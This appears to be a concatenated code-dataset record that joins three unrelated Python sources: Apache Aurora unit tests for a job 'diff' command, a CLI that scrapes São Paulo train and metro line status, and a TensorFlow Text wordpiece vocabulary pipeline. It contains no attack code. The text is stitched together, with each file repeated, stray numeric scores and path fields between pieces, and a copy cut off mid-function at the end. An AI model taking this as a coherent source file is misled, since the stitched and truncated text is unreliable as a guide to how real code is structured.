def test_service_diff_old_api(self):
config = self.get_job_config()
query = TaskQuery(
jobKeys=[self.TEST_JOBKEY.to_thrift()],
statuses=ACTIVE_STATES)
self._fake_context.get_job_config = Mock(return_value=config)
self._mock_api.populate_job_config.return_value = self.populate_job_config_result()
self._mock_api.get_job_update_diff.side_effect = SchedulerProxy.ThriftInternalError("Expected")
self._mock_api.query.return_value = self.create_empty_task_result()
self._mock_api.build_query.return_value = query
with contextlib.nested(
patch('subprocess.call', return_value=0),
patch('json.loads', return_value={})) as (subprocess_patch, _):
result = self._command.execute(self._fake_context)
assert result == EXIT_OK
assert self._mock_api.populate_job_config.mock_calls == [call(config)]
assert self._mock_api.get_job_update_diff.mock_calls == [
call(config, self._mock_options.instance_spec.instance)
]
assert self._mock_api.query.mock_calls == [call(query)]
assert subprocess_patch.call_count == 1
assert subprocess_patch.call_args[0][0].startswith(
os.environ.get('DIFF_VIEWER', 'diff') + ' ')
def test_cron_diff(self):
config = self.get_job_config(is_cron=True)
query = TaskQuery(
jobKeys=[self.TEST_JOBKEY.to_thrift()],
statuses=ACTIVE_STATES)
self._fake_context.get_job_config = Mock(return_value=config)
self._mock_api.populate_job_config.return_value = self.populate_job_config_result()
self._mock_api.query.return_value = self.create_empty_task_result()
self._mock_api.build_query.return_value = query
with contextlib.nested(
patch('subprocess.call', return_value=0),
patch('json.loads', return_value={})) as (subprocess_patch, _):
result = self._command.execute(self._fake_context)
assert result == EXIT_OK
assert self._mock_api.populate_job_config.mock_calls == [call(config)]
assert self._mock_api.query.mock_calls == [call(query)]
assert subprocess_patch.call_count == 1
assert subprocess_patch.call_args[0][0].startswith(
os.environ.get('DIFF_VIEWER', 'diff') + ' ') | Chapter4/Aurora/src/test/python/apache/aurora/client/cli/test_diff.py |
import contextlib
import os
import textwrap
from mock import Mock, call, patch
from pystachio import Empty
from apache.aurora.client.api import SchedulerProxy
from apache.aurora.client.cli import EXIT_OK
from apache.aurora.client.cli.jobs import DiffCommand
from apache.aurora.client.cli.options import TaskInstanceKey
from apache.aurora.config import AuroraConfig
from apache.aurora.config.schema.base import Job
from apache.thermos.config.schema_base import MB, Process, Resources, Task
from .util import AuroraClientCommandTest, FakeAuroraCommandContext, mock_verb_options
from gen.apache.aurora.api.constants import ACTIVE_STATES
from gen.apache.aurora.api.ttypes import (
ConfigGroup,
GetJobUpdateDiffResult,
PopulateJobResult,
Range,
ResponseCode,
Result,
ScheduleStatusResult,
TaskQuery
)
class TestDiffCommand(AuroraClientCommandTest):
def setUp(self):
self._command = DiffCommand()
self._mock_options = mock_verb_options(self._command)
self._mock_options.instance_spec = TaskInstanceKey(self.TEST_JOBKEY, [0, 1])
self._fake_context = FakeAuroraCommandContext()
self._fake_context.set_options(self._mock_options)
self._mock_api = self._fake_context.get_api("test")
@classmethod
def get_job_config(self, is_cron=False):
return AuroraConfig(job=Job(
cluster='west',
role='bozo',
environment='test',
name='the_job',
service=True if not is_cron else False,
cron_schedule='* * * * *' if is_cron else Empty,
task=Task(
name='task',
processes=[Process(cmdline='ls -la', name='process')],
resources=Resources(cpu=1.0, ram=1024 * MB, disk=1024 * MB)
),
instances=3,
))
@classmethod
def create_status_response(cls):
resp = cls.create_simple_success_response()
resp.result = Result(
scheduleStatusResult=ScheduleStatusResult(tasks=set(cls.create_scheduled_tasks())))
return resp
@classmethod
def create_failed_status_response(cls):
return cls.create_blank_response(ResponseCode.INVALID_REQUEST, 'No tasks found for query')
@classmethod
def populate_job_config_result(cls):
populate = cls.create_simple_success_response()
populate.result = Result(populateJobResult=PopulateJobResult(
taskConfig=cls.create_scheduled_tasks()[0].assignedTask.task))
return populate
@classmethod
def get_job_update_diff_result(cls):
diff = cls.create_simple_success_response()
task = cls.create_task_config('foo')
diff.result = Result(getJobUpdateDiffResult=GetJobUpdateDiffResult(
add=set([ConfigGroup(
config=task,
instances=frozenset([Range(first=10, last=10), Range(first=12, last=14)]))]),
remove=frozenset(),
update=frozenset([ConfigGroup(
config=task,
instances=frozenset([Range(first=11, last=11)]))]),
unchanged=frozenset([ConfigGroup(
config=task,
instances=frozenset([Range(first=0, last=9)]))])
))
return diff
def test_service_diff(self):
config = self.get_job_config()
self._fake_context.get_job_config = Mock(return_value=config)
self._mock_api.populate_job_config.return_value = self.populate_job_config_result()
self._mock_api.get_job_update_diff.return_value = self.get_job_update_diff_result()
with contextlib.nested(
patch('subprocess.call', return_value=0),
patch('json.loads', return_value={})) as (subprocess_patch, _):
result = self._command.execute(self._fake_context)
assert result == EXIT_OK
assert self._mock_api.populate_job_config.mock_calls == [call(config)]
assert self._mock_api.get_job_update_diff.mock_calls == [
call(config, self._mock_options.instance_spec.instance)
]
assert "\n".join(self._fake_context.get_out()) == textwrap.dedent("""\
This job update will:
add instances: [10], [12-14]
update instances: [11]
with diff:\n\n
not change instances: [0-9]""")
assert subprocess_patch.call_count == 1
assert subprocess_patch.call_args[0][0].startswith(
os.environ.get('DIFF_VIEWER', 'diff') + ' ')
def test_service_diff_old_api(self):
config = self.get_job_config()
query = TaskQuery(
jobKeys=[self.TEST_JOBKEY.to_thrift()],
statuses=ACTIVE_STATES)
self._fake_context.get_job_config = Mock(return_value=config)
self._mock_api.populate_job_config.return_value = self.populate_job_config_result()
self._mock_api.get_job_update_diff.side_effect = SchedulerProxy.ThriftInternalError("Expected")
self._mock_api.query.return_value = self.create_empty_task_result()
self._mock_api.build_query.return_value = query
with contextlib.nested(
patch('subprocess.call', return_value=0),
patch('json.loads', return_value={})) as (subprocess_patch, _):
result = self._command.execute(self._fake_context)
assert result == EXIT_OK
assert self._mock_api.populate_job_config.mock_calls == [call(config)]
assert self._mock_api.get_job_update_diff.mock_calls == [
call(config, self._mock_options.instance_spec.instance)
]
assert self._mock_api.query.mock_calls == [call(query)]
assert subprocess_patch.call_count == 1
assert subprocess_patch.call_args[0][0].startswith(
os.environ.get('DIFF_VIEWER', 'diff') + ' ')
def test_cron_diff(self):
config = self.get_job_config(is_cron=True)
query = TaskQuery(
jobKeys=[self.TEST_JOBKEY.to_thrift()],
statuses=ACTIVE_STATES)
self._fake_context.get_job_config = Mock(return_value=config)
self._mock_api.populate_job_config.return_value = self.populate_job_config_result()
self._mock_api.query.return_value = self.create_empty_task_result()
self._mock_api.build_query.return_value = query
with contextlib.nested(
patch('subprocess.call', return_value=0),
patch('json.loads', return_value={})) as (subprocess_patch, _):
result = self._command.execute(self._fake_context)
assert result == EXIT_OK
assert self._mock_api.populate_job_config.mock_calls == [call(config)]
assert self._mock_api.query.mock_calls == [call(query)]
assert subprocess_patch.call_count == 1
assert subprocess_patch.call_args[0][0].startswith(
os.environ.get('DIFF_VIEWER', 'diff') + ' ') | 0.543833 | 0.094052 |
# Standard libraries. Should not fail.
import sys
import json
import textwrap
from argparse import Action
from argparse import ArgumentParser
from argparse import RawTextHelpFormatter
# Required 3rd-party libraries.
try:
from requests_html import HTMLSession
from tabulate import tabulate
from colorama import init
from colorama import Fore
from colorama import Style
init(autoreset=True)
except ImportError as err:
print(
'TPSP: impossible to import 3rd-party libraries.\n'
'Latest traceback: {0}'.format(err.args[0])
)
sys.exit(1)
PROGRAM_NAME = 'tpsp'
PROGRAM_DESCRIPTION = 'CLI to CPTM and Metro lines status'
PROGRAM_VERSION = '1.0.1'
PROGRAM_URL = 'https://github.com/caian-org/tpsp'
COPYRIGHT_INFO = """
The person who associated a work with this deed has dedicated the work to the
public domain by waiving all of his or her rights to the work worldwide under
copyright law, including all related and neighboring rights, to the extent
allowed by law.
You can copy, modify, distribute and perform the work, even for commercial
purposes, all without asking permission.
AFFIRMER OFFERS THE WORK AS-IS AND MAKES NO REPRESENTATIONS OR WARRANTIES OF
ANY KIND CONCERNING THE WORK, EXPRESS, IMPLIED, STATUTORY OR OTHERWISE,
INCLUDING WITHOUT LIMITATION WARRANTIES OF TITLE, MERCHANTABILITY, FITNESS FOR
A PARTICULAR PURPOSE, NON INFRINGEMENT, OR THE ABSENCE OF LATENT OR OTHER
DEFECTS, ACCURACY, OR THE PRESENT OR ABSENCE OF ERRORS, WHETHER OR NOT
DISCOVERABLE, ALL TO THE GREATEST EXTENT PERMISSIBLE UNDER APPLICABLE LAW.
For more information, please see
<http://creativecommons.org/publicdomain/zero/1.0/>
"""
class CLI:
def __init__(self):
self.sources = list(Service.all())
self.parser = ArgumentParser(
prog=PROGRAM_NAME,
formatter_class=RawTextHelpFormatter,
description=textwrap.dedent(
'''\
{0}: {1}
{0} (portuguese for "São Paulo public transportation")
is a tiny command-line tool that tells you the current
status of CPTM's and Metro lines.
'''.format(
PROGRAM_NAME, PROGRAM_DESCRIPTION
)
),
epilog=textwrap.dedent(
'''\
examples:
$ {0} cptm
# => shows the current state of all CPTM lines
$ {0} metro --json
# => shows the current state of all Metro lines and formats
the output in JSON
This is a Free and Open-Source Software (FOSS).
Project page: <{1}>'''.format(
PROGRAM_NAME, PROGRAM_URL
)
),
)
# --------------------------------------------------
self.parser.add_argument(
'service',
action='store',
choices=self.sources,
nargs=1,
type=str,
help='the public transportation service',
)
self.parser.add_argument(
'-v',
'--version',
action='version',
version='{0} ({1})'.format(PROGRAM_NAME, PROGRAM_VERSION),
help='show the program version and exit',
)
self.parser.add_argument(
'-j',
'--json',
action='store_true',
dest='json',
help='show the output in JSON format',
)
self.parser.add_argument(
'--copyright',
action=Copyright,
nargs=0,
help='show the copyright information and exit',
)
def act(self):
return self.parser.parse_args()
class Copyright(Action):
def __init__(self, option_strings, dest, **kwargs):
super().__init__(option_strings, dest, **kwargs)
def __call__(self, parser, namespace, values, option_string=None):
print(COPYRIGHT_INFO)
sys.exit(0)
class Service:
@staticmethod
def all():
for ds in Service.__subclasses__():
yield ds.__name__.lower()
class CPTM(Service):
def __init__(self):
self.url = 'https://www.cptm.sp.gov.br/Pages/Home.aspx'
self.session = HTMLSession()
def fetch_data(self):
refs = ['rubi', 'diamante', 'esmeralda', 'turquesa', 'coral', 'safira', 'jade']
res = self.session.get(self.url)
for ref in refs:
data = res.html.find('.{0}'.format(ref), first=True)
yield {
'line': ref.capitalize(),
'status': data.text.replace(ref.upper(), ''),
}
class METRO(Service):
def __init__(self):
self.url = 'http://www.metro.sp.gov.br/Sistemas/direto-do-metro-via4/diretodoMetroHome.aspx'
self.session = HTMLSession()
def fetch_data(self):
res = self.session.get(self.url)
names = res.html.find('.{0}'.format('nomeDaLinha'))
stati = res.html.find('.{0}'.format('statusDaLinha'))
for idx, name in enumerate(names):
line = name.text.split('-')[1]
status = stati[idx].text
yield {'line': line.strip(), 'status': status}
class Output:
def __init__(self, data):
self.data = data
@property
def table(self):
def header(cols):
for col in cols:
yield '{}{}{}'.format(Style.BRIGHT, col, Style.RESET_ALL)
def line_status(status):
color = Fore.WHITE
if 'normal' in status:
color = Fore.GREEN
elif 'reduzida' in status:
color = Fore.YELLOW
elif 'paralisada' in status:
color = Fore.RED
elif 'encerrada' in status:
color = Style.DIM
return '{}{}{}'.format(color, status.title(), Style.RESET_ALL)
def beautify():
for data in self.data:
yield [data['line'], line_status(data['status'].lower())]
cols = ['Linha', 'Status']
return tabulate(list(beautify()), headers=list(header(cols)))
@property
def json(self):
return json.dumps(
{'code': 200, 'data': list(self.data), 'message': 'success'},
ensure_ascii=False,
sort_keys=True,
indent=4,
)
def main():
cli = CLI()
args = cli.act()
service = getattr(sys.modules[__name__], args.service[0].upper())
try:
data = service().fetch_data()
outp = Output(data)
print('\n{}'.format(outp.json if args.json else outp.table))
except Exception as error:
print('Could not fetch data\n')
print(str(error))
sys.exit(1)
if __name__ == '__main__':
main() | tpsp/__init__.py |
# Standard libraries. Should not fail.
import sys
import json
import textwrap
from argparse import Action
from argparse import ArgumentParser
from argparse import RawTextHelpFormatter
# Required 3rd-party libraries.
try:
from requests_html import HTMLSession
from tabulate import tabulate
from colorama import init
from colorama import Fore
from colorama import Style
init(autoreset=True)
except ImportError as err:
print(
'TPSP: impossible to import 3rd-party libraries.\n'
'Latest traceback: {0}'.format(err.args[0])
)
sys.exit(1)
PROGRAM_NAME = 'tpsp'
PROGRAM_DESCRIPTION = 'CLI to CPTM and Metro lines status'
PROGRAM_VERSION = '1.0.1'
PROGRAM_URL = 'https://github.com/caian-org/tpsp'
COPYRIGHT_INFO = """
The person who associated a work with this deed has dedicated the work to the
public domain by waiving all of his or her rights to the work worldwide under
copyright law, including all related and neighboring rights, to the extent
allowed by law.
You can copy, modify, distribute and perform the work, even for commercial
purposes, all without asking permission.
AFFIRMER OFFERS THE WORK AS-IS AND MAKES NO REPRESENTATIONS OR WARRANTIES OF
ANY KIND CONCERNING THE WORK, EXPRESS, IMPLIED, STATUTORY OR OTHERWISE,
INCLUDING WITHOUT LIMITATION WARRANTIES OF TITLE, MERCHANTABILITY, FITNESS FOR
A PARTICULAR PURPOSE, NON INFRINGEMENT, OR THE ABSENCE OF LATENT OR OTHER
DEFECTS, ACCURACY, OR THE PRESENT OR ABSENCE OF ERRORS, WHETHER OR NOT
DISCOVERABLE, ALL TO THE GREATEST EXTENT PERMISSIBLE UNDER APPLICABLE LAW.
For more information, please see
<http://creativecommons.org/publicdomain/zero/1.0/>
"""
class CLI:
def __init__(self):
self.sources = list(Service.all())
self.parser = ArgumentParser(
prog=PROGRAM_NAME,
formatter_class=RawTextHelpFormatter,
description=textwrap.dedent(
'''\
{0}: {1}
{0} (portuguese for "São Paulo public transportation")
is a tiny command-line tool that tells you the current
status of CPTM's and Metro lines.
'''.format(
PROGRAM_NAME, PROGRAM_DESCRIPTION
)
),
epilog=textwrap.dedent(
'''\
examples:
$ {0} cptm
# => shows the current state of all CPTM lines
$ {0} metro --json
# => shows the current state of all Metro lines and formats
the output in JSON
This is a Free and Open-Source Software (FOSS).
Project page: <{1}>'''.format(
PROGRAM_NAME, PROGRAM_URL
)
),
)
# --------------------------------------------------
self.parser.add_argument(
'service',
action='store',
choices=self.sources,
nargs=1,
type=str,
help='the public transportation service',
)
self.parser.add_argument(
'-v',
'--version',
action='version',
version='{0} ({1})'.format(PROGRAM_NAME, PROGRAM_VERSION),
help='show the program version and exit',
)
self.parser.add_argument(
'-j',
'--json',
action='store_true',
dest='json',
help='show the output in JSON format',
)
self.parser.add_argument(
'--copyright',
action=Copyright,
nargs=0,
help='show the copyright information and exit',
)
def act(self):
return self.parser.parse_args()
class Copyright(Action):
def __init__(self, option_strings, dest, **kwargs):
super().__init__(option_strings, dest, **kwargs)
def __call__(self, parser, namespace, values, option_string=None):
print(COPYRIGHT_INFO)
sys.exit(0)
class Service:
@staticmethod
def all():
for ds in Service.__subclasses__():
yield ds.__name__.lower()
class CPTM(Service):
def __init__(self):
self.url = 'https://www.cptm.sp.gov.br/Pages/Home.aspx'
self.session = HTMLSession()
def fetch_data(self):
refs = ['rubi', 'diamante', 'esmeralda', 'turquesa', 'coral', 'safira', 'jade']
res = self.session.get(self.url)
for ref in refs:
data = res.html.find('.{0}'.format(ref), first=True)
yield {
'line': ref.capitalize(),
'status': data.text.replace(ref.upper(), ''),
}
class METRO(Service):
def __init__(self):
self.url = 'http://www.metro.sp.gov.br/Sistemas/direto-do-metro-via4/diretodoMetroHome.aspx'
self.session = HTMLSession()
def fetch_data(self):
res = self.session.get(self.url)
names = res.html.find('.{0}'.format('nomeDaLinha'))
stati = res.html.find('.{0}'.format('statusDaLinha'))
for idx, name in enumerate(names):
line = name.text.split('-')[1]
status = stati[idx].text
yield {'line': line.strip(), 'status': status}
class Output:
def __init__(self, data):
self.data = data
@property
def table(self):
def header(cols):
for col in cols:
yield '{}{}{}'.format(Style.BRIGHT, col, Style.RESET_ALL)
def line_status(status):
color = Fore.WHITE
if 'normal' in status:
color = Fore.GREEN
elif 'reduzida' in status:
color = Fore.YELLOW
elif 'paralisada' in status:
color = Fore.RED
elif 'encerrada' in status:
color = Style.DIM
return '{}{}{}'.format(color, status.title(), Style.RESET_ALL)
def beautify():
for data in self.data:
yield [data['line'], line_status(data['status'].lower())]
cols = ['Linha', 'Status']
return tabulate(list(beautify()), headers=list(header(cols)))
@property
def json(self):
return json.dumps(
{'code': 200, 'data': list(self.data), 'message': 'success'},
ensure_ascii=False,
sort_keys=True,
indent=4,
)
def main():
cli = CLI()
args = cli.act()
service = getattr(sys.modules[__name__], args.service[0].upper())
try:
data = service().fetch_data()
outp = Output(data)
print('\n{}'.format(outp.json if args.json else outp.table))
except Exception as error:
print('Could not fetch data\n')
print(str(error))
sys.exit(1)
if __name__ == '__main__':
main() | 0.406509 | 0.130009 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tempfile
from absl import app
from absl import flags
import apache_beam as beam
import tensorflow.compat.v1 as tf
import tensorflow_transform as tft
import tensorflow_transform.beam as tft_beam
from tensorflow_transform.tf_metadata import dataset_metadata
from tensorflow_transform.tf_metadata import dataset_schema
from wordpiece_vocab import utils
from wordpiece_vocab import wordpiece_tokenizer_learner_lib as learner
FLAGS = flags.FLAGS
flags.DEFINE_string('data_file', None, 'The input data file path.')
flags.DEFINE_string('vocab_file', None, 'The output vocab file path.')
flags.DEFINE_string('metrics_file', None, 'The output metrics file path.')
flags.DEFINE_string(
'lang_set', 'en,es,ru,ar,de,fr,it,pt,ja,pl,fa,zh',
'Set of languages used to build wordpiece model, '
'given as a comma-separated list.')
flags.DEFINE_string('text_key', 'text', 'Text feature key in input examples.')
flags.DEFINE_string(
'language_code_key', 'language_code', 'Language code feature key.')
flags.DEFINE_float(
'smoothing_exponent', 0.5,
'Exponent used in calculating exponential smoothing coefficients.')
flags.DEFINE_integer('max_word_length', 50,
'Discard words of length greater than max_word_length.')
flags.DEFINE_integer('upper_thresh', 10000000,
'Upper threshold for binary search.')
flags.DEFINE_integer('lower_thresh', 10, 'Lower threshold for binary search.')
flags.DEFINE_integer('num_iterations', 4,
'Number of iterations in wordpiece learning algorithm.')
flags.DEFINE_integer('num_pad_tokens', 100, 'Number of padding tokens to '
'include in vocab.')
flags.DEFINE_integer('max_input_tokens', 5000000,
'Maximum number of input tokens, where -1 means no max.')
flags.DEFINE_integer('max_token_length', 50, 'Maximum length of a token.')
flags.DEFINE_integer('max_unique_chars', 1000,
'Maximum number of unique characters as tokens.')
flags.DEFINE_integer('vocab_size', 110000, 'Target size of generated vocab, '
'where vocab_size is an upper bound and the size of vocab '
'can be within slack_ratio less than the vocab_size.')
flags.DEFINE_float('slack_ratio', 0.05,
'Difference permitted between target and actual vocab size.')
flags.DEFINE_bool('include_joiner_token', True,
'Whether to include joiner token in word suffixes.')
flags.DEFINE_string('joiner', '##', 'Joiner token in word suffixes.')
flags.DEFINE_list('reserved_tokens',
['<unk>', '<s>', '</s>', '<mask>',
'<cls>', '<sep>', '<S>', '<T>'],
'Reserved tokens to be included in vocab.')
def generate_vocab(data_file, vocab_file, metrics_file, raw_metadata, params,
min_token_frequency=2):
"""Returns a pipeline generating a vocab and writing the output.
Args:
data_file: recordio file to read
vocab_file: path in which to write the vocab
metrics_file: path in which to write the metrics
raw_metadata: schema for dataset
params: parameters for wordpiece vocab learning algorithm
min_token_frequency: the min frequency for a token to be included
"""
lang_set = set(FLAGS.lang_set.split(','))
# Schema to format metrics as CSV.
csv_schema = dataset_schema.from_feature_spec({
'lang': tf.FixedLenFeature([], tf.string),
'sample_count': tf.FixedLenFeature([], tf.int64),
'micro_drop_char_percent': tf.FixedLenFeature([], tf.string),
'macro_drop_char_percent': tf.FixedLenFeature([], tf.string),
'micro_compress_ratio': tf.FixedLenFeature([], tf.string),
'macro_compress_ratio': tf.FixedLenFeature([], tf.string),
'unweighted_en_wp_overlap_percent': tf.FixedLenFeature([], tf.string),
'weighted_en_wp_overlap_percent': tf.FixedLenFeature([], tf.string),
})
columns = ['lang',
'sample_count',
'micro_drop_char_percent',
'macro_drop_char_percent',
'micro_compress_ratio',
'macro_compress_ratio',
'unweighted_en_wp_overlap_percent',
'weighted_en_wp_overlap_percent']
example_converter = tft.coders.ExampleProtoCoder(raw_metadata.schema,
serialized=False)
def run_vocab():
"""Creates a pipeline to generate wordpiece vocab over a corpus."""
vocab_pipeline = beam.Pipeline()
with tft_beam.Context(temp_dir=tempfile.mkdtemp()):
# Read raw data and convert to TF Transform encoded dict.
raw_data = (
vocab_pipeline
| 'ReadInputData' >> beam.io.tfrecordio.ReadFromTFRecord(
data_file, coder=beam.coders.ProtoCoder(tf.train.Example))
| 'DecodeInputData' >> beam.Map(example_converter.decode))
# Apply TF Transform.
(transformed_data, _), _ = (
(raw_data, raw_metadata)
| 'FilterLangAndExtractToken' >> tft_beam.AnalyzeAndTransformDataset(
utils.count_preprocessing_fn(FLAGS.text_key,
FLAGS.language_code_key)))
# Filter by languages.
tokens = (
transformed_data
| 'FilterByLang' >> beam.ParDo(utils.FilterTokensByLang(lang_set)))
# Calculate smoothing coefficients.
coeffs = (
tokens
| 'CalculateSmoothingCoefficients' >> beam.CombineGlobally(
utils.CalculateCoefficients(FLAGS.smoothing_exponent)))
# Apply smoothing, aggregate counts, and sort words by count.
_ = (
tokens
| 'ApplyExponentialSmoothing' >> beam.ParDo(
utils.ExponentialSmoothing(), beam.pvalue.AsSingleton(coeffs))
| 'SumCounts' >> beam.CombinePerKey(sum)
| 'FilterLowCounts' >> beam.ParDo(utils.FilterByCount(
FLAGS.max_word_length, min_token_frequency))
| 'MergeAndSortCounts' >> beam.CombineGlobally(utils.SortByCount())
| 'LearnVocab' >> beam.ParDo(utils.LearnVocab(params))
| 'Flatten' >> beam.FlatMap(lambda x: x + '\n')
| 'WriteVocab' >> beam.io.WriteToText(vocab_file,
shard_name_template='',
append_trailing_newlines=False))
return vocab_pipeline
def run_metrics():
"""Creates a pipeline to measure wordpiece vocab metrics over a corpus."""
metrics_pipeline = beam.Pipeline()
with tft_beam.Context(temp_dir=tempfile.mkdtemp()):
# Read raw data and convert to TF Transform encoded dict.
raw_data = (
metrics_pipeline
| 'ReadInputData' >> beam.io.tfrecordio.ReadFromTFRecord(
data_file, coder=beam.coders.ProtoCoder(tf.train.Example))
| 'DecodeInputData' >> beam.Map(example_converter.decode))
# Apply transform to wordpiece-tokenize input.
(metrics_transformed_data, _), _ = (
(raw_data, raw_metadata)
| 'WordpieceTokenizeInput' >> tft_beam.AnalyzeAndTransformDataset(
utils.metrics_preprocessing_fn(FLAGS.vocab_file,
FLAGS.text_key,
FLAGS.language_code_key)))
# Initialize CSV coder. Aggregate values for each lang, calculate metrics,
# and write to output to a CSV file.
csv_converter = tft.coders.CsvCoder(columns, csv_schema)
_ = (
metrics_transformed_data
| 'CompileTokenInfo' >> beam.ParDo(utils.CompileTokenizationInfo())
| 'CombineStatsForLang' >> beam.CombineGlobally(utils.AggregateLang())
| 'CalculateMetrics' >> beam.ParDo(utils.CalculateMetrics())
| 'EncodeMetrics' >> beam.Map(csv_converter.encode)
| 'WriteMetrics' >> beam.io.WriteToText(
metrics_file, shard_name_template='', header=','.join(columns)))
return metrics_pipeline
vocab_pipeline = run_vocab()
vocab_pipeline.run().wait_until_finish()
metrics_pipeline = run_metrics()
metrics_pipeline.run().wait_until_finish()
def main(_):
# Define schema.
raw_metadata = dataset_metadata.DatasetMetadata(
dataset_schema.from_feature_spec({
'text': tf.FixedLenFeature([], tf.string),
'language_code': tf.FixedLenFeature([], tf.string),
}))
# Add in padding tokens.
reserved_tokens = FLAGS.reserved_tokens
if FLAGS.num_pad_tokens:
padded_tokens = ['<pad>']
padded_tokens += ['<pad%d>' % i for i in range(1, FLAGS.num_pad_tokens)]
reserved_tokens = padded_tokens + reserved_tokens
params = learner.Params(FLAGS.upper_thresh, FLAGS.lower_thresh,
FLAGS.num_iterations, FLAGS.max_input_tokens,
FLAGS.max_token_length, FLAGS.max_unique_chars,
FLAGS.vocab_size, FLAGS.slack_ratio,
FLAGS.include_joiner_token, FLAGS.joiner,
reserved_tokens)
generate_vocab(FLAGS.data_file, FLAGS.vocab_file, FLAGS.metrics_file,
raw_metadata, params)
if __name__ == '__main__':
app.run(main) | third_party/tensorflow-text/src/tools/wordpiece_vocab/generate_vocab.py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tempfile
from absl import app
from absl import flags
import apache_beam as beam
import tensorflow.compat.v1 as tf
import tensorflow_transform as tft
import tensorflow_transform.beam as tft_beam
from tensorflow_transform.tf_metadata import dataset_metadata
from tensorflow_transform.tf_metadata import dataset_schema
from wordpiece_vocab import utils
from wordpiece_vocab import wordpiece_tokenizer_learner_lib as learner
FLAGS = flags.FLAGS
flags.DEFINE_string('data_file', None, 'The input data file path.')
flags.DEFINE_string('vocab_file', None, 'The output vocab file path.')
flags.DEFINE_string('metrics_file', None, 'The output metrics file path.')
flags.DEFINE_string(
'lang_set', 'en,es,ru,ar,de,fr,it,pt,ja,pl,fa,zh',
'Set of languages used to build wordpiece model, '
'given as a comma-separated list.')
flags.DEFINE_string('text_key', 'text', 'Text feature key in input examples.')
flags.DEFINE_string(
'language_code_key', 'language_code', 'Language code feature key.')
flags.DEFINE_float(
'smoothing_exponent', 0.5,
'Exponent used in calculating exponential smoothing coefficients.')
flags.DEFINE_integer('max_word_length', 50,
'Discard words of length greater than max_word_length.')
flags.DEFINE_integer('upper_thresh', 10000000,
'Upper threshold for binary search.')
flags.DEFINE_integer('lower_thresh', 10, 'Lower threshold for binary search.')
flags.DEFINE_integer('num_iterations', 4,
'Number of iterations in wordpiece learning algorithm.')
flags.DEFINE_integer('num_pad_tokens', 100, 'Number of padding tokens to '
'include in vocab.')
flags.DEFINE_integer('max_input_tokens', 5000000,
'Maximum number of input tokens, where -1 means no max.')
flags.DEFINE_integer('max_token_length', 50, 'Maximum length of a token.')
flags.DEFINE_integer('max_unique_chars', 1000,
'Maximum number of unique characters as tokens.')
flags.DEFINE_integer('vocab_size', 110000, 'Target size of generated vocab, '
'where vocab_size is an upper bound and the size of vocab '
'can be within slack_ratio less than the vocab_size.')
flags.DEFINE_float('slack_ratio', 0.05,
'Difference permitted between target and actual vocab size.')
flags.DEFINE_bool('include_joiner_token', True,
'Whether to include joiner token in word suffixes.')
flags.DEFINE_string('joiner', '##', 'Joiner token in word suffixes.')
flags.DEFINE_list('reserved_tokens',
['<unk>', '<s>', '</s>', '<mask>',
'<cls>', '<sep>', '<S>', '<T>'],
'Reserved tokens to be included in vocab.')
def generate_vocab(data_file, vocab_file, metrics_file, raw_metadata, params,
min_token_frequency=2):
"""Returns a pipeline generating a vocab and writing the output.
Args:
data_file: recordio file to read
vocab_file: path in which to write the vocab
metrics_file: path in which to write the metrics
raw_metadata: schema for dataset
params: parameters for wordpiece vocab learning algorithm
min_token_frequency: the min frequency for a token to be included
"""
lang_set = set(FLAGS.lang_set.split(','))
# Schema to format metrics as CSV.
csv_schema = dataset_schema.from_feature_spec({
'lang': tf.FixedLenFeature([], tf.string),
'sample_count': tf.FixedLenFeature([], tf.int64),
'micro_drop_char_percent': tf.FixedLenFeature([], tf.string),
'macro_drop_char_percent': tf.FixedLenFeature([], tf.string),
'micro_compress_ratio': tf.FixedLenFeature([], tf.string),
'macro_compress_ratio': tf.FixedLenFeature([], tf.string),
'unweighted_en_wp_overlap_percent': tf.FixedLenFeature([], tf.string),
'weighted_en_wp_overlap_percent': tf.FixedLenFeature([], tf.string),
})
columns = ['lang',
'sample_count',
'micro_drop_char_percent',
'macro_drop_char_percent',
'micro_compress_ratio',
'macro_compress_ratio',
'unweighted_en_wp_overlap_percent',
'weighted_en_wp_overlap_percent']
example_converter = tft.coders.ExampleProtoCoder(raw_metadata.schema,
serialized=False)
def run_vocab():
"""Creates a pipeline to generate wordpiece vocab over a corpus."""
vocab_pipeline = beam.Pipeline()
with tft_beam.Context(temp_dir=tempfile.mkdtemp()):
# Read raw data and convert to TF Transform encoded dict.
raw_data = (
vocab_pipeline
| 'ReadInputData' >> beam.io.tfrecordio.ReadFromTFRecord(
data_file, coder=beam.coders.ProtoCoder(tf.train.Example))
| 'DecodeInputData' >> beam.Map(example_converter.decode))
# Apply TF Transform.
(transformed_data, _), _ = (
(raw_data, raw_metadata)
| 'FilterLangAndExtractToken' >> tft_beam.AnalyzeAndTransformDataset(
utils.count_preprocessing_fn(FLAGS.text_key,
FLAGS.language_code_key)))
# Filter by languages.
tokens = (
transformed_data
| 'FilterByLang' >> beam.ParDo(utils.FilterTokensByLang(lang_set)))
# Calculate smoothing coefficients.
coeffs = (
tokens
| 'CalculateSmoothingCoefficients' >> beam.CombineGlobally(
utils.CalculateCoefficients(FLAGS.smoothing_exponent)))
# Apply smoothing, aggregate counts, and sort words by count.
_ = (
tokens
| 'ApplyExponentialSmoothing' >> beam.ParDo(
utils.ExponentialSmoothing(), beam.pvalue.AsSingleton(coeffs))
| 'SumCounts' >> beam.CombinePerKey(sum)
| 'FilterLowCounts' >> beam.ParDo(utils.FilterByCount(
FLAGS.max_word_length, min_token_frequency))
| 'MergeAndSortCounts' >> beam.CombineGlobally(utils.SortByCount())
| 'LearnVocab' >> beam.ParDo(utils.LearnVocab(params))
| 'Flatten' >> beam.FlatMap(lambda x: x + '\n')
| 'WriteVocab' >> beam.io.WriteToText(vocab_file,
shard_name_template='',
append_trailing_newlines=False))
return vocab_pipeline
def run_metrics():
"""Creates a pipeline to measure wordpiece vocab metrics over a corpus."""
metrics_pipeline = beam.Pipeline()
with tft_beam.Context(temp_dir=tempfile.mkdtemp()):
# Read raw data and convert to TF Transform encoded dict.
raw_data = (
metrics_pipeline
| 'ReadInputData' >> beam.io.tfrecordio.ReadFromTFRecord(
data_file, coder=beam.coders.ProtoCoder(tf.train.Example))
| 'DecodeInputData' >> beam.Map(example_converter.decode))
# Apply transform to wordpiece-tokenize input.
(metrics_transformed_data, _), _ = (
(raw_data, raw_metadata)
| 'WordpieceTokenizeInput' >> tft_beam.AnalyzeAndTransformDataset(
